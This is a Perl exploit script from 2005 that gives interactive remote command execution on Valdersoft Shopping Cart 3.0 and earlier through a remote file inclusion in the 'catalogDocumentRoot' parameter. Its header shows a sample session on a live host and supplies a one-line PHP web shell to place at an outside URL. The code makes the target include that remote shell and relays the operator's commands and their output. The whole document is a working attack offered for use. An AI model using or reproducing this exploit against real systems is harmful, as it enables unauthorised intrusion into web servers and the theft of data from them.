#!/usr/bin/perl
#
# cijfer-vscxpl - Valdersoft Shopping Cart <=3.0 Remote Command Execution Exploit
#
# Copyright (c) 2005 cijfer <[email protected]>
# All rights reserved.
#
## 1. example
#
# [cijfer@kalma:/research]$ ./cijfer-vscxpl.pl -h www.valdersoft.com -d /store
# [[email protected] /]$ id;uname -a
# uid=2526(apache) gid=2524(apache) groups=2524(apache), 10004(psaserv)
# FreeBSD valdersoft.com 4.9-RELEASE FreeBSD 4.9-RELEASE #0: Wed Nov 19 00:35:22 EST 2003
# [email protected]:/usr/src/sys/compile/PLESK i386
#
# [[email protected] /]$
#
## 2. explanation
#
# various files within 'include\templates\categories' contains unsanitized and undefined
# variables which can allow remote file inclusion, leading to remote command execution.
# this can be done by entering a remote url within the 'catalogDocumentRoot' variable.
#
## 3. the bug
#
# this is obvious _why_ it is dangerous.
#
# ...
# include($catalogDocumentRoot.$catalogDir."include/modules/categories_path.php");
# ...
#
## 4. the php shell
#
# this exploit grabs data via regular expression strings. foreign php shell
# scripts will not work with this exploit. use the following code along with
# this exploit and put it in 'cmd.txt' or whatever you please:
#
# <?passthru($_GET[cmd]);?>
#
##
#
# $Id: cijfer-vscxpl.pl,v 0.2 2005/12/30 11:44:00 cijfer Exp cijfer $
use Getopt::Std;
use IO::Socket;
use URI::Escape;
getopts("h:d:");
$host = $opt_h;
$dirs = $opt_d;
$shel = "http://site.com/cmd.txt"; # cmd shell url
$cmdv = "cmd"; # cmd variable (ex. passthru($_GET[cmd]);)
$good = 0;
if(!$host||!$dirs)
{
print "cijfer-vscxpl.pl by cijfer\n";
print "usage: $0 -h cijfer.xxx -d /valdersoft\r\n";
print "usage: $0 -h <hostname> -d <directory>\r\n";
exit();
}
while()
{
print "[cijfer@".$host." /]\$ ";
while(<STDIN>)
{
$cmds=$_;
chomp($cmds);
last;
}
$string = $dirs;
$string .= "/include/templates/categories/default.php?";
$string .= uri_escape($cmdv);
$string .= "=";
$string .= "%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B";
$string .= uri_escape($cmds).";echo";
$string .= "%3B%65%63%68%6F%20%5F%45%4E%44%5F;echo;";
$string .= "&catalogDocumentRoot=";
$string .= $shel;
$string .= "?";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
print $sock "GET $string HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "Connection: close\n\n";
while($result = <$sock>)
{
if($result =~ /^_END_/)
{
$good=0;
}
if($good==1)
{
print $result;
}
if($result =~ /^_START_/)
{
$good=1;
}
}
}
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